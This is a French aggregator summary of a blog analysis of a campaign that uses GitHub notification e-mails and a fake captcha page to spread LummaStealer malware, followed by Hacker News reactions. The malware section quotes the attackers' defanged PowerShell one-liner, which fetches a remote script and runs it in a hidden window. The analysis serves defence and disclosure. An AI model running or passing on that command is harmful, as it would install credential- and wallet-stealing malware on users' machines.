Campagne de diffusion de malware exploitant les e-mails de notification GitHub

 (ianspence.com)
1 points par GN⁺ 2024-09-20 | 1 commentaires | Partager sur WhatsApp
  • En tant que développeur open source, on reçoit souvent des e-mails de GitHub
  • La plupart de ces e-mails sont des notifications indiquant des interactions d’utilisateurs GitHub
  • Mais certains e-mails poussent au téléchargement de malware en se faisant passer pour la sécurité de GitHub

Méthode d’attaque

  1. L’attaquant utilise un compte GitHub temporaire pour créer une issue dans un dépôt public
  2. L’attaquant supprime rapidement l’issue
  3. Le propriétaire du dépôt reçoit un e-mail de notification
  4. Il clique sur le lien dans l’e-mail
  5. Il suit les instructions et infecte son système avec le malware

Analyse du message e-mail

  • Le contenu de l’e-mail est en grande partie contrôlable par l’attaquant
  • L’e-mail n’indique pas qu’une nouvelle issue a été créée
  • L’attaquant se fait passer pour la "Github Security Team"
  • Comme l’e-mail est effectivement envoyé par GitHub, il passe les vérifications anti-phishing

Pistes d’amélioration pour GitHub

  • Fournir davantage de contexte dans les e-mails pourrait réduire l’efficacité de l’attaque
  • Il faut réduire la part de contenu contrôlable par l’attaquant et clarifier l’expéditeur

Site web

  • En suivant le lien de l’e-mail, on arrive sur une page de captcha
  • La page de captcha pousse l’utilisateur à saisir une commande dans la boîte de dialogue Exécuter de Windows

Malware

  • Le site copie la commande suivante dans le presse-papiers : 
    powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content"
  • Cette commande lance un processus PowerShell, télécharge un script et l’exécute

Étapes du malware

  1. Un script est téléchargé et exécuté via une commande PowerShell
  2. Le script télécharge et exécute un binaire malveillant
  3. Le binaire possède une signature numérique, mais elle n’est pas valide
  4. Windows n’affiche pas d’avertissement pour une signature invalide

Faiblesses de Windows

  • Le drapeau "Mark of the Web" (MOTW), qui identifie les fichiers téléchargés depuis Internet, n’est pas défini
  • La classe System.Net.WebClient du .NET Framework ne définit pas le drapeau MOTW
  • Lorsque le drapeau MOTW n’est pas défini, Windows n’avertit pas en cas de signature invalide

Analyse du malware

  • Le malware est chargé et exécuté en mémoire
  • Il s’agit du malware LummaStealer, qui vole des portefeuilles de cryptomonnaies, des identifiants enregistrés, etc.

Conclusion

  • Un cas d’attaque exploitant les faiblesses des e-mails de notification GitHub
  • L’analyse a été menée à l’aide de divers outils

Récapitulatif GN⁺

  • Cet article traite d’un cas d’attaque par malware exploitant les e-mails de notification GitHub
  • Le malware est diffusé en exploitant les faiblesses du système d’e-mail de GitHub
  • L’attaque tire parti des faiblesses du drapeau "Mark of the Web" de Windows et de la vérification des signatures numériques
  • Le malware utilisé est LummaStealer
  • Ces faiblesses ont été signalées à GitHub et à Microsoft
  • Parmi les projets similaires, l’analyse de Cyfirma est recommandée

À lire aussi

1 commentaires

 
GN⁺ 2024-09-20
Avis sur Hacker News

  • J’ai récemment reçu un e-mail très convaincant de PayPal

    • Quelqu’un avait utilisé la fonction de citation pour définir comme nom d’entreprise : "PayPal need to get in touch about a your recent payment of $499.00, please call +1-...."
    • L’e-mail provenait bien de PayPal.com, et je ne comprends pas qu’ils ne contrôlent pas ce genre de nom d’utilisateur
    • Je l’ai signalé, mais je n’ai pas encore reçu de réponse
    • Cet e-mail était formaté pour ressembler à un véritable message de PayPal, donc beaucoup de gens risquent de se faire avoir

  • Je me demande vraiment si des gens tombent dans ce genre d’arnaque

    • En supposant qu’ils savent que l’e-mail vient de github
    • Premier signal d’alerte : l’e-mail renvoie vers une variante du vrai domaine
    • Deuxième signal d’alerte : le captcha demande de saisir une commande shell

  • Des développeurs juniors pourraient facilement se faire piéger par ce type d’arnaque

    • "Oh, tiens, résoudre un captcha en exécutant du code, c’est original !"

  • Une page web ne devrait pas pouvoir remplir le presse-papiers en un simple clic

    • Il ne faut ni cliquer sur les liens d’un e-mail, ni faire confiance à son contenu
    • Le vrai problème, c’est que Windows permette encore d’obtenir les droits root avec une simple commande PowerShell sur une ligne

  • Github devrait empêcher ses services automatisés d’insérer des liens dans les issues sans les vérifier

    • Github devrait mieux contrôler ce qu’il envoie par e-mail

  • Je me demande si github-scanner.com est toujours un acteur malveillant

    • Cloudflare héberge le DNS, et il n’y a aucun moyen de signaler ce problème

  • L’attaquant a supprimé l’issue rapidement

    • Seuls les administrateurs peuvent supprimer une issue
    • Il reste donc une trace de l’issue dans le dépôt

  • Bon article, ça m’a rappelé le blog de Julia Evans

  • C’est triste qu’en 2024 il y ait encore des gens qui se font avoir par les tromperies les plus simples

  • J’ai reçu ce genre de notification ce matin et je l’ai ignorée

    • La notification concernait un dépôt précis

  • Ça vaut le coup d’être lu, ça montre ce qu’ils essayaient de faire

    • Rien qu’avec le lien, ça peut paraître suspect, mais c’est intéressant de voir quelqu’un creuser le sujet

  • J’ai reçu un e-mail de notification GitHub similaire

    • Il disait qu’une vulnérabilité avait été trouvée dans un dépôt, mais je n’ai pas cliqué
    • Je ne l’ai pas fait parce que je suis un programmeur paresseux